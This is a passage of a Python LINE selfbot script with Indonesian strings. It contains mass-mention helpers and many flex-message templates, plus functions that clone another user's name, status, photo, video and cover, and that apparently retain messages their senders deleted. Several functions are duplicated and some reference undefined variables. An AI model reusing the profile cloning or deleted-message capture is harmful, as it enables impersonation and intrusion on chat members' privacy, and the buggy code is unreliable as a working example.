temp_flood[tmp]["time"] = time.time()
try:
cl.sendMessage(tmp, "Bot kembali aktif")
except Exception as error:
logError(error)
def cTime_to_datetime(unixtime):
return datetime.fromtimestamp(int(str(unixtime)[:len(str(unixtime))-3]))
Extr = cl.getContact(Import_Server).displayName
def sendSticker(to, version, packageId, stickerId):
contentMetadata = {
'STKVER': version,
'STKPKGID': packageId,
'STKID': stickerId
}
cl.sendMessage(to, '', contentMetadata, 7)
def changeVideoAndPictureProfile(pict, vids):
try:
files = {'file': open(vids, 'rb')}
obs_params = cl.genOBSParams({'oid': mid, 'ver': '2.0', 'type': 'video', 'cat': 'vp.mp4'})
data = {'params': obs_params}
r_vp = cl.server.postContent('{}/talk/vp/upload.nhn'.format(str(cl.server.LINE_OBS_DOMAIN)), data=data, files=files)
if r_vp.status_code != 201:
return "Failed update profile"
cl.updateProfilePicture(pict, 'vp')
return "Success update profile"
except Exception as e:
raise Exception("Error change video and picture profile {}".format(str(e)))
def changeProfileVideo(to):
if settings['changeProfileVideo']['picture'] == None:
return cl.sendMessage(to, "Foto tidak ditemukan")
elif settings['changeProfileVideo']['video'] == None:
return cl.sendMessage(to, "Video tidak ditemukan")
else:
path = settings['changeProfileVideo']['video']
files = {'file': open(path, 'rb')}
obs_params = cl.genOBSParams({'oid': cl.getProfile().mid, 'ver': '2.0', 'type': 'video', 'cat': 'vp.mp4'})
data = {'params': obs_params}
r_vp = cl.server.postContent('{}/talk/vp/upload.nhn'.format(str(cl.server.LINE_OBS_DOMAIN)), data=data, files=files)
if r_vp.status_code != 201:
return cl.sendMessage(to, "Gagal update profile")
path_p = settings['changeProfileVideo']['picture']
settings['changeProfileVideo']['status'] = False
cl.updateProfilePicture(path_p, 'vp')
def cloneProfile(mid):
contact = cl.getContact(mid)
if contact.videoProfile == None:
cl.cloneContactProfile(mid)
else:
profile = cl.getProfile()
profile.displayName, profile.statusMessage = contact.displayName, contact.statusMessage
cl.updateProfile(profile)
pict = cl.downloadFileURL('http://dl.profile.line-cdn.net/' + contact.pictureStatus, saveAs="tmp/pict.bin")
vids = cl.downloadFileURL( 'http://dl.profile.line-cdn.net/' + contact.pictureStatus + '/vp', saveAs="tmp/video.bin")
changeVideoAndPictureProfile(pict, vids)
coverId = cl.getProfileDetail(mid)['result']['objectId']
cl.updateProfileCoverById(coverId)
def restoreProfile():
profile = cl.getProfile()
profile.displayName = settings['myProfile']['displayName']
profile.statusMessage = settings['myProfile']['statusMessage']
if settings['myProfile']['videoProfile'] == None:
profile.pictureStatus = settings['myProfile']['pictureStatus']
cl.updateProfileAttribute(8, profile.pictureStatus)
cl.updateProfile(profile)
else:
cl.updateProfile(profile)
pict = cl.downloadFileURL('http://dl.profile.line-cdn.net/' + settings['myProfile']['pictureStatus'], saveAs="tmp/pict.bin")
vids = cl.downloadFileURL( 'http://dl.profile.line-cdn.net/' + settings['myProfile']['pictureStatus'] + '/vp', saveAs="tmp/video.bin")
changeVideoAndPictureProfile(pict, vids)
coverId = settings['myProfile']['coverId']
cl.updateProfileCoverById(coverId)
def speedtest(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours,24)
weaks, days = divmod(days,7)
if days == 0:
return '%02d' % (secs)
elif days > 0 and weaks == 0:
return '%02d' %(secs)
elif days > 0 and weaks > 0:
return '%02d' %(secs)
def backupProfile():
profile = cl.getContact(mid)
settings['myProfile']['displayName'] = profile.displayName
settings['myProfile']['pictureStatus'] = profile.pictureStatus
settings['myProfile']['statusMessage'] = profile.statusMessage
settings['myProfile']['videoProfile'] = profile.videoProfile
coverId = cl.getProfileDetail()['result']['objectId']
settings['myProfile']['coverId'] = str(coverId)
def delete_log():
ndt = datetime.now()
for data in list(msg_dict):  # iterate over a copy; entries may be deleted below
if (datetime.utcnow() - cTime_to_datetime(msg_dict[data]["createdTime"])) > timedelta(1):
if "path" in msg_dict[data]:
cl.deleteFile(msg_dict[data]["path"])
del msg_dict[data]
extras = Extr+"\n"
def delete_log1():
ndt = datetime.now()
for data in list(msg_dict1):  # iterate over a copy; entries may be deleted below
if (datetime.utcnow() - cTime_to_datetime(msg_dict1[data]["createdTime"])) > timedelta(1):
if "path" in msg_dict1[data]:
cl.deleteFile(msg_dict1[data]["path"])
del msg_dict1[data]
def cTime_to_datetime(unixtime):
return datetime.fromtimestamp(int(str(unixtime)[:len(str(unixtime))-3]))
def dt_to_str(dt):
return dt.strftime('%H:%M:%S')
def delete_log():
ndt = datetime.now()
for data in list(msg_dict):  # iterate over a copy; entries may be deleted below
if (datetime.utcnow() - cTime_to_datetime(msg_dict[data]["createdTime"])) > timedelta(1):
del msg_dict[data]
def downloadImageWithURL (mid):
contact = cl.getContact(mid)
if contact.videoProfile == None:
cl.cloneContactProfile(mid)
else:
profile = cl.getProfile()
profile.displayName, profile.statusMessage = contact.displayName, contact.statusMessage
cl.updateProfile(profile)
pict = cl.downloadFileURL('http://dl.profile.line-cdn.net/' + contact.pictureStatus, saveAs="tmp/pict.bin")
vids = cl.downloadFileURL( 'http://dl.profile.line-cdn.net/' + contact.pictureStatus + '/vp', saveAs="tmp/video.bin")
changeVideoAndPictureProfile(pict, vids)
coverId = cl.getProfileDetail(mid)['result']['objectId']
cl.updateProfileCoverById(coverId)
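# The mention helpers below build LINE's MENTIONEES metadata: each entry is
# {'S': start, 'E': end, 'M': mid}, where S/E are character offsets of the
# "@..." placeholder inside the message text and M is the mentioned user's MID.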
def sendMeention(to, text="", mids=[]):
arrData = ""
arr = []
mention = "@InexBots \n"
if mids == []:
raise Exception("Invalid mids")
if "@!" in text:
if text.count("@!") != len(mids):
raise Exception("Invalid mids")
texts = text.split("@!")
textx = ""
for mid in mids:
textx += str(texts[mids.index(mid)])
slen = len(textx)
elen = len(textx) + 15
arrData = {'S':str(slen), 'E':str(elen - 4), 'M':mid}
arr.append(arrData)
textx += mention
textx += str(texts[len(mids)])
else:
textx = ""
slen = len(textx)
elen = len(textx) + 15
arrData = {'S':str(slen), 'E':str(elen - 4), 'M':mids[0]}
arr.append(arrData)
textx += mention + str(text)
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
def sendMention1(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@InexBots "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
cl.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def mentionMembers(to, mid):
try:
arrData = ""
textx = "Total Mention User「{}」\n\n [ Mention ]\n1. ".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
mention = "@InexBots\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention
if no < len(mid):
no += 1
textx += "%i. " % (num)
num=(num+1)
else:
try:
no = "\n╚☠•➤[ {} ]".format(str(cl.getGroup(to).name))
except:
no = "\n╚☠•➤[ Success ]"
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def siderMembers(to, mid):
try:
arrData = ""
textx = "☠•➤Total User☠•➤「{}」\n☠•➤Haii ".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
mention = "@InexBots\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention+wait["mention"]
if no < len(mid):
no += 1
textx += "%i. " % (num)
num=(num+1)
else:
try:
no = "\n╚☠•➤[ {} ]".format(str(cl.getGroup(to).name))
except:
no = "\n╚☠•➤[ Success ]"
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
# NOTE: 'contact' appears never to be defined at this point, so this image send
# typically raises and the handler falls back to the sticker in the except branch.
image = 'http://dl.profile.line.naver.jp'+contact
cl.sendImageWithURL(op.param2, image)
cl.sendMessage(to, None, contentMetadata={"STKID":"51626528","STKPKGID":"11538","STKVER":"1"}, contentType=7)
except Exception as error:
cl.sendMessage(to, None, contentMetadata={"STKID":"51626528","STKPKGID":"11538","STKVER":"1"}, contentType=7)
def welcomeMembers(to, mid):
try:
arrData = ""
textx = "山乇ㄥ匚ㄖ爪乇 "
arr = []
no = 1
num = 2
for i in mid:
ginfo = cl.getGroup(to)
mention = "@InexBots\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention+wait["welcome"]+"\nNama grup : "+str(ginfo.name)
if no < len(mid):
no += 1
textx += "%i " % (num)
num=(num+1)
else:
try:
no = "\n╚☠•➤[ {} ]".format(str(cl.getGroup(to).name))
except:
no = "\n╚☠•➤[ Success ]"
#cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
data = {
"type": "flex",
"altText": "JANGAN KABUR DARI GRUP KAK",
"contents": {
"type": "bubble",
"styles": {
"header": {
"backgroundColor": "#000080",
},
"body": {
"backgroundColor": "#0000FF",
"separator": True,
"separatorColor": "#ffffff"
},
"footer": {
"backgroundColor": "#000080",
"separator": True
}
},
"header": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "山乇ㄥ匚ㄖ爪乇 爪乇爪乃乇尺",
"weight": "bold",
"color": "#FF0000",
"size": "xxl"
}
]
},
"hero": {
"type": "image",
"url": "https://thumbs.gfycat.com/DearestPoshAfricanclawedfrog.webp",
"size": "full",
"aspectRatio": "20:13",
"aspectMode": "cover",
"action": {
"type": "uri",
"uri": "https://line.me/ti/p/~denjaka-inexx"
}
},
"type": "bubble",
"body": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": str(textx),
"wrap": True,
"color": "#00FF00",
"align": "center"
}
]
},
"footer": {
"type": "box",
"layout": "vertical",
"spacing": "sm",
"contents": [{
"type": "button",
"style": "primary",
"color": "#00FF00",
"height": "sm",
"action": {
"type": "uri",
"label": "ADD MY LINE",
"uri": "https://line.me/ti/p/"+cl.getUserTicket().id
}
},
{
"type": "spacer",
"size": "sm",
}],
"flex": 0
}
}
}
cl.sendFlex(to, data)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def leaveMembers(to, mid):
try:
arrData = ""
textx = " ".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
ginfo = cl.getGroup(to)
mention = "@InexBots\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += "bye bye"
if no < len(mid):
no += 1
textx += "%i " % (num)
num=(num+1)
else:
try:
no = "\n╚☠•➤[ {} ]".format(str(cl.getGroup(to).name))
except:
no = "\n╚☠•➤[ Success ]"
except Exception as error:
cl.sendMessage(to)
#TAGALL LUAR ROOM BAHAN
def mentionMembers(to, mid):
try:
arrData = ""
textx = "╭━━━━━━━━━━━━━━━━━━━━╮\n├ ☠ MENTION [ {} ] MEMBER\n├━━━━━━━━━━━━━━━━━━━━\n├[1.]☠".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
mention = "@InexBots\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention
if no < len(mid):
no += 1
textx += "├[%i.]☠ " % (num)
num=(num+1)
else:
try:
no = "\n╚☠•➤[ {} ]".format(str(line.getGroup(to).name))
except:
no = "\n╚☠•➤[ Success ]"
cl.sendMessage(to, textx+"╰━━━━━━━━━━━━━━━━━━━━╯", {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
logError(error)
def sendMentionV3(to, text="", mids=[]):
arrData = ""
arr = []
mention = "@InexBots "
if mids == []:
raise Exception("Invalid mids")
if "@!" in text:
if text.count("@!") != len(mids):
raise Exception("Invalid mids")
texts = text.split("@!")
textx = ""
for mid in mids:
textx += str(texts[mids.index(mid)])
slen = len(textx)
elen = len(textx) + 15
arrData = {'S':str(slen), 'E':str(elen - 4), 'M':mid}
arr.append(arrData)
textx += mention
textx += str(texts[len(mids)])
else:
textx = ""
slen = len(textx)
elen = len(textx) + 15
arrData = {'S':str(slen), 'E':str(elen - 4), 'M':mids[0]}
arr.append(arrData)
textx += mention + str(text)
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
def sendMentionV2(to, text="", mids=[]):
arrData = ""
arr = []
mention = "@InexBots "
if mids == []:
raise Exception("Invalid mids")
if "@!" in text:
if text.count("@!") != len(mids):
raise Exception("Invalid mids")
texts = text.split("@!")
textx = ""
for mid in mids:
textx += str(texts[mids.index(mid)])
slen = len(textx)
elen = len(textx) + 15
arrData = {'S':str(slen), 'E':str(elen - 4), 'M':mid}
arr.append(arrData)
textx += mention
textx += str(texts[len(mids)])
else:
textx = ""
slen = len(textx)
elen = len(textx) + 15
arrData = {'S':str(slen), 'E':str(elen - 4), 'M':mids[0]}
arr.append(arrData)
textx += mention + str(text)
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
def sendMention(to, mid, firstmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@InexBots \n"
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
today = datetime.today()
future = datetime(2018,3,1)
hari = (str(future - today))
comma = hari.find(",")
hari = hari[:comma]
teman = cl.getAllContactIds()
gid = cl.getGroupIdsJoined()
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
eltime = time.time() - mulai
bot = runtime(eltime)
text += mention+"◐ Jam : "+datetime.strftime(timeNow,'%H:%M:%S')+" Wib\n⏩ Group : "+str(len(gid))+"\n⏩ Teman : "+str(len(teman))+"\n⏩ Expired : In "+hari+"\n⏩ Version : ANTIJS2\n⏩ Tanggal : "+datetime.strftime(timeNow,'%Y-%m-%d')+"\n⏩ Runtime : \n • "+bot
cl.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendStickerTemplate(to, text):
url = "https://game.linefriends.com/jbp-lcs-ranking/lcs/sendMessage"
to = op.param1
data = {
"type": "template",
"altText": "{} sent a sticker".format(client.getProfile().displayName),
"template": {
"type": "image_carousel",
"columns": [
{
"imageUrl": text,
"size": "full",
"action": {
"type": "uri",
"uri": "http://line.me/ti/p/~mdfs99"
}
}
]
}
}
cl.sendFlex(to, data)
def sendBcast(to, text):
warna1 = ("#1AE501","#0108E5","#E50AE0","#E50F00","#DEE500","#47E1E5","#C82EF8")
warnanya1 = random.choice(warna1)
data = {
"type": "flex",
"altText": "Kickall ", #.format(dzProfile.displayName),
"contents": {
"type": "bubble",
"styles": {
"header": {
"backgroundColor": "#0000FF",
},
"body": {
"backgroundColor": "#000000",
"separator": True,
"separatorColor": "#ffffff"
},
"footer": {
"backgroundColor": "#000080",
"separator": True
}
},
"header": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "乃尺ㄖ卂ᗪ匚卂丂ㄒ",
"weight": "bold",
"color": warnanya1,
"size": "md"
}
]
},
"hero": {
"type": "image",
"url": "https://media.giphy.com/media/67pVlH3LSLDjTBikzf/giphy.gif",
"size": "full",
"aspectRatio": "20:13",
"aspectMode": "cover",
"action": {
"type": "uri",
"uri": "https://line.me/ti/p/~denjaka-inexx"
}
},
"type": "bubble",
"body": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": text,
"wrap": True,
"color": warnanya1,
"align": "center"
}
]
},
"footer": {
"type": "box",
"layout": "vertical",
"spacing": "sm",
"contents": [{
"type": "button",
"style": "primary",
"color": warnanya1,
"height": "sm",
"action": {
"type": "uri",
"label": "ADD MY LINE",
"uri": "https://line.me/ti/p/"+cl.getUserTicket().id
}
},
{
"type": "spacer",
"size": "sm",
}],
"flex": 0
}
}
}
cl.sendFlex(to, data)
def sendTextTemplate13(to, text):
warna1 = ("#1AE501","#0108E5","#E50AE0","#E50F00","#DEE500","#47E1E5","#C82EF8")
warnanya1 = random.choice(warna1)
data = {
"type": "flex",
"altText": "InexBots",
"contents": {
"styles": {
"body": {
"backgroundColor": "#000000"
},
"footer": {
"backgroundColor": "#000000"
}
},
"type": "bubble",
"body": {
"contents": [
{
"contents": [
{
"text": " INDONESIA EXTHREME",
"size": "xs",
"color": "#00FF33",
"wrap": True,
"weight": "bold",
"type": "text"
},
{
"type": "separator",
"color": "#000000"
}
],
"type": "box",
"spacing": "md",
"layout": "horizontal"
},
{
"contents": [
{
"contents": [
{
"text": text,
"size": "sm",
"margin": "none",
"color": "#FFFF00",
"wrap": True,
"weight": "regular",
"type": "text"
}
],
"type": "box",
"layout": "baseline"
}
],
"type": "box",
"layout": "vertical"
}
],
"type": "box",
"spacing": "md",
"layout": "vertical"
},
"footer": {
"type": "box",
"layout": "vertical",
"contents": [{
"type": "box",
"layout": "horizontal",
"contents": [{
"type": "button",
"flex": 2,
"style": "primary",
"color": "#006400",
"height": "sm",
"action": {
"type": "uri",
"label": "OFFICIAL",
"uri": "https://line.me/R/ti/p/%40bvb1195k"
}
}, {
"flex": 3,
"type": "button",
"style": "primary",
"color": "#800000",
"margin": "sm",
"height": "sm",
"action": {
"type": "uri",
"label": "CREATOR",
"uri": "http://line.me/ti/p/~denjaka-inexx"
}
}]
}]
}
}
}
cl.sendFlex(to, data)
def sendBradcast(to, text):
warna1 = ("#1AE501","#0108E5","#E50AE0","#E50F00","#DEE500","#47E1E5","#C82EF8")
warnanya1 = random.choice(warna1)
data = {
"type": "flex",
"altText": "Kickall ", #.format(dzProfile.displayName),
"contents": {
"type": "bubble",
"styles": {
"header": {
"backgroundColor": "#0000FF",
},
"body": {
"backgroundColor": "#000000",
"separator": True,
"separatorColor": "#ffffff"
},
"footer": {
"backgroundColor": "#000080",
"separator": True
}
},
"header": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "乃尺ㄖ卂ᗪ匚卂丂ㄒ",
"weight": "bold",
"color": warnanya1,
"size": "md"
}
]
},
"hero": {
"type": "image",
"url": "https://media.giphy.com/media/67pVlH3LSLDjTBikzf/giphy.gif",
"size": "full",
"aspectRatio": "20:13",
"aspectMode": "cover",
"action": {
"type": "uri",
"uri": "https://line.me/ti/p/~denjaka-inexx"
}
},
"type": "bubble",
"body": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": text,
"wrap": True,
"color": warnanya1,
"align": "center"
}
]
},
"footer": {
"type": "box",
"layout": "vertical",
"spacing": "sm",
"contents": [{
"type": "button",
"style": "primary",
"color": warnanya1,
"height": "sm",
"action": {
"type": "uri",
"label": "ADD MY LINE",
"uri": "https://line.me/ti/p/"+cl.getUserTicket().id
}
},
{
"type": "spacer",
"size": "sm",
}],
"flex": 0
}
}
}
cl.sendFlex(to, data)
def sendTextTemplate7(to, text):
warna1 = ("#1AE501","#0108E5","#E50AE0","#E50F00","#DEE500","#47E1E5","#C82EF8")
warnanya1 = random.choice(warna1)
data = {
"type": "flex",
"altText": "{} menghapus anda dari grup".format(cl.getProfile().displayName),
"contents": {
"type": "bubble",
"body": {
"type": "box",
"layout": "horizontal",
"spacing": "md",
"contents": [
{
"type": "box",
"layout": "vertical",
"flex": 2,
"contents": [
{
"type": "text",
"text": text,
"size": "md",
"weight": "bold",
"wrap": True,
"color": "#40E0D0",
"align": "center"
},
]
}
]
},
"styles": {
"body": {
"backgroundColor": "#000000"
},
"footer": {
"backgroundColor": "#00008B"
},
"header": {
"backgroundColor": "#00008B"
}
},
"hero": {
"type": "image",
"aspectRatio": "20:13",
"aspectMode": "cover",
"url": "https://obs.line-scdn.net/{}".format(cl.getContact(op.param2).pictureStatus),
"size": "full",
"margin": "xl"
},
"footer": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "CREATOR",
"size": "xl",
"wrap": True,
"weight": "bold",
"color": "#7CFC00",
"action": {
"type": "uri",
"uri": "http://line.me/ti/p/~denjaka-inexx"
},
"align": "center"
},
{
"type": "separator",
"color": "#E5E4E2"
},
{
"type": "text",
"text": "ORDER",
"size": "xl",
"wrap": True,
"weight": "bold",
"color": "#FFD700",
"action": {
"type": "uri",
"uri": "line://app/1602687308-GXq4Vvk9/?type=text&text=price"
},
"align": "center"
}
]
},
"header": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "INEXBOT",
"size": "xl",
"wrap": True,
"weight": "bold",
"color": "#F0F8FF",
"align": "center"
}
]
}
}
}
cl.sendFlex(to, data)
def sendTextTemplate44(to, text):
warna1 = ("#1AE501","#0108E5","#E50AE0","#E50F00","#DEE500","#47E1E5","#C82EF8")
warnanya1 = random.choice(warna1)
data = {
"type": "flex",
"altText": "{} Mencintaimu ".format(cl.getProfile().displayName),
"contents": {
"type": "bubble",
"styles": {
"header": {
"backgroundColor": "#0000FF",
},
"body": {
"backgroundColor": "#000000",
"separator": True,
"separatorColor": "#ffffff"
},
"footer": {
"backgroundColor": "#000080",
"separator": True
}
},
"header": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "Nama : {}".format(cl.getContact(op.param2).displayName),
"weight": "bold",
"color": warnanya1,
"size": "md"
}
]
},
"hero": {
"type": "image",
"url": "https://obs.line-scdn.net/{}".format(cl.getContact(op.param2).pictureStatus),
"size": "full",
"aspectRatio": "20:13",
"aspectMode": "cover",
"action": {
"type": "uri",
"uri": "https://line.me/ti/p/~denjaka-inexx"
}
},
"type": "bubble",
"body": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "{}".format(cl.getContact(op.param2).displayName)+str(text),
"wrap": True,
"color": warnanya1,
"align": "center"
}
]
},
"footer": {
"type": "box",
"layout": "vertical",
"spacing": "sm",
"contents": [{
"type": "button",
"style": "primary",
"color": warnanya1,
"height": "sm",
"action": {
"type": "uri",
"label": "ADD MY LINE",
"uri": "https://line.me/ti/p/"+cl.getUserTicket().id
}
},
{
"type": "spacer",
"size": "sm",
}],
"flex": 0
}
}
}
cl.sendFlex(to, data)
def sendTextTemplate1(to, text):
warna1 = ("#1AE501","#0108E5","#E50AE0","#E50F00","#DEE500","#47E1E5","#C82EF8")
warnanya1 = random.choice(warna1)
data = {
"type": "template",
"altText": "InexBots",
"contents": {
"type": "bubble",
"body": {
"type": "box",
"layout": "vertical",
"contents": [
{
"text": text,
"size": "sm",
"margin": "none",
"color": "#8B008B",
"wrap": True,
"weight": "regular",
"type": "text"
}
]
}
}
}
cl.sendFlex(to, data)
def sendTextTemplate3(to, text):
warna1 = ("#1AE501","#0108E5","#E50AE0","#E50F00","#DEE500","#47E1E5","#C82EF8")
warnanya1 = random.choice(warna1)
data = {
"type": "flex",
"altText": "HELP XTC INEX",
"contents": {
"type": "bubble",
"body": {
"type": "box",
"layout": "horizontal",
"spacing": "md",
"contents": [
{
"type": "box",
"layout": "vertical",
"flex": 2,
"contents": [
{
"type": "text",
"text": text,
"size": "sm",
"weight": "bold",
"wrap": True,
"color": "#40ff00"
}
]
}
]
},
"styles": {
"body": {
"backgroundColor": "#000000"
},
"footer": {
"backgroundColor": "#03f5f1"
},
"header": {
"backgroundColor": "#03f5f1"
}
},
"hero": {
"type": "image",
"aspectRatio": "20:13",
"aspectMode": "cover",
"url": "https://media.giphy.com/media/67pVlH3LSLDjTBikzf/giphy.gif",
"size": "full",
"margin": "xl"
},
"footer": {
"type": "box",
"layout": "vertical",
"contents": [{
"type": "box",
"layout": "horizontal",
"contents": [{
"type": "button",
"flex": 2,
"style": "primary",
"color": "#ff0a3b",
"height": "sm",
"action": {
"type": "uri",
"label": "OFFICIAL",
"uri": "https://line.me/R/ti/p/%40bvb1195k"
}
}, {
"flex": 3,
"type": "button",
"style": "primary",
"color": "#310dff",
"margin": "sm",
"height": "sm",
"action": {
"type": "uri",
"label": "CREATOR",
"uri": "http://line.me/ti/p/~denjaka-inexx"
}
}]
}]
}
}
}
cl.sendFlex(to, data)
def sendStickerTemplate(to, text):
url = "https://game.linefriends.com/jbp-lcs-ranking/lcs/sendMessage"
to = op.param1
data = {
"type": "template",
"altText": "{} sent a sticker".format(cl.getProfile().displayName),
"template": {
"type": "image_carousel",
"columns": [
{
"imageUrl": text,
"size": "full",
"action": {
"type": "uri",
"uri": "http://line.me/ti/p/~denjaka-inexx"
}
}
]
}
}
cl.sendFlex(to, data)
def sendTextTemplate4(to, text):
data = {
"type": "flex",
"altText": "{} lagi kojom dulu".format(cl.getProfile().displayName),
"contents": {
"type": "bubble",
"body": {
"type": "box",
"layout": "horizontal",
"spacing": "md",
"contents": [
{
"type": "box",
"layout": "vertical",
"flex": 2,
"contents": [
{
"type": "text",
"text": text,
"size": "md",
"weight": "bold",
"wrap": True,
"color": "#40E0D0",
"align": "center"
},
]
}
]
},
"styles": {
"body": {
"backgroundColor": "#000000"
},
"footer": {
"backgroundColor": "#00008B"
},
"header": {
"backgroundColor": "#00008B"
}
},
"hero": {
"type": "image",
"aspectRatio": "20:13",
"aspectMode": "cover",
"url": "https://obs.line-scdn.net/{}".format(cl.getContact(op.param2).pictureStatus),
"size": "full",
"margin": "xl"
},
"footer": {
"type": "box",
"layout": "vertical",
"contents": [{
"type": "box",
"layout": "horizontal",
"contents": [{
"type": "button",
"flex": 2,
"style": "primary",
"color": "#006400",
"height": "sm",
"action": {
"type": "uri",
"label": "OFFICIAL",
"uri": "https://line.me/R/ti/p/%40bvb1195k"
}
}, {
"flex": 3,
"type": "button",
"style": "primary",
"color": "#800000",
"margin": "sm",
"height": "sm",
"action": {
"type": "uri",
"label": "CREATOR",
"uri": "http://line.me/ti/p/~denjaka-inexx"
}
}]
}]
}
}
}
cl.sendFlex(to, data)
def sendFoto(to, images):
url = "https://game.linefriends.com/jbp-lcs-ranking/lcs/sendMessage"
to = msg.to
data = {
"type": "template",
"altText": "{} tukang unsend".format(cl.getProfile().displayName),
"template": {
"type": "image_carousel",
"columns": [
{
"imageUrl": "https://obs.line-scdn.net/{}".format(cl.getContact(msg_dict[msg_id]["data"])),
"size": "full",
"action": {
"type": "uri",
"uri": "http://line.me/ti/p/~denjaka-inexx"
}
}
]
}
}
cl.sendFlex(to, data)
def sendTextTemplate(to, text):
warna1 = ("#1AE501","#0108E5","#E50AE0","#E50F00","#DEE500","#47E1E5","#C82EF8")
warnanya1 = random.choice(warna1)
data = {
"type": "flex",
"altText": "InexBots",
"contents": {
"type": "bubble",
"body": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": text,
"color": "#3800E0",
"wrap": True
}
]
}
}
}
cl.sendFlex(to, data)
def sendAutolike(to,text):
data = {
"type": "template",
"altText": "InexBots",
"template": {
"type": "carousel",
"actions": [],
"columns": [
{
"thumbnailImageUrl": "https://scontent.fcgk8-1.fna.fbcdn.net/v/t1.0-9/fr/cp0/e15/q65/51689146_2326064860750957_3568131342002552832_o.jpg?_nc_cat=100&efg=eyJpIjoiYiJ9&_nc_eui2=AeEKUakDYnXikuMkE8vPPZhxEuKQRqPyo08BbWoruGL-DN9mYH2NmCnik886MGJCiMS8D7ZSUmabSAcRk7S3_GwwhAIKCVBmiq32OaYa0XaV-w&_nc_ht=scontent.fcgk8-1.fna&oh=18937dc8439c5fdf7c9de33c6f00fad6&oe=5D0231F5",
"title": "{}".format(cl.getContact(op.param2).displayName),
"text": text,
"actions": [
{
"type": "uri",
"label": "CREATOR",
"uri": "http://line.me/ti/p/~denjaka-inexx"
}
]
}
]
}
}
cl.sendFlex(to, data)
def sendCyduk(to, text):
contact = cl.getContact(op.param2)
favoritelist = cl.getFavoriteMids()
grouplist = cl.getGroupIdsJoined()
contactlist = cl.getAllContactIds()
blockedlist = cl.getBlockedContactIds()
data = {
"type": "flex",
"altText": "{} Lagi nyari janda".format(jakaProfile.displayName),
"contents": {
"styles": {
"body": {
"backgroundColor": "#000080"
},
"footer": {
"backgroundColor": "#000080"
}
},
"type": "bubble",
"body": {
"contents": [
{
"contents": [
{
"text": "BIO DATA\n❀ NAMA: {}".format(cl.getContact(op.param2).displayName)+"\n❀ GROUP: {}".format(str(len(grouplist)))+"\n❀ FRIEND : {}".format(str(len(contactlist)))+"\n❀ FAFORITE : {}".format(str(len(favoritelist)))+"\n❀ BLOCKED : {}".format(str(len(blockedlist)))+"\nBio: {}".format(cl.getContact(op.param2).statusMessage),
"size": "sm",
"color": "#FF3366",
"wrap": True,
"type": "text",
"align": "center"
},
{
"type": "separator",
"color": "#FF0000"
},
{
"url": "https://obs.line-scdn.net/{}".format(cl.getContact(op.param2).pictureStatus),
"type": "image",
"size": "full"
}
],
"type": "box",
"spacing": "md",
"layout": "horizontal"
},
{
"type": "separator",
"color": "#FF0000"
},
{
"contents": [
{
"contents": [
{
"size": "xxl",
"type": "icon",
"url": "https://obs.line-scdn.net/{}".format(cl.getContact(mid).pictureStatus)
},
{
"text": text,
"size": "sm",
"margin": "none",
"color": "#00FF00",
"wrap": True,
"weight": "regular",
"type": "text",
"align": "center"
}
],
"type": "box",
"layout": "baseline"
}
],
"type": "box",
"layout": "horizontal"
}
],
"type": "box",
"spacing": "md",
"layout": "vertical"
},
"footer": {
"type": "box",
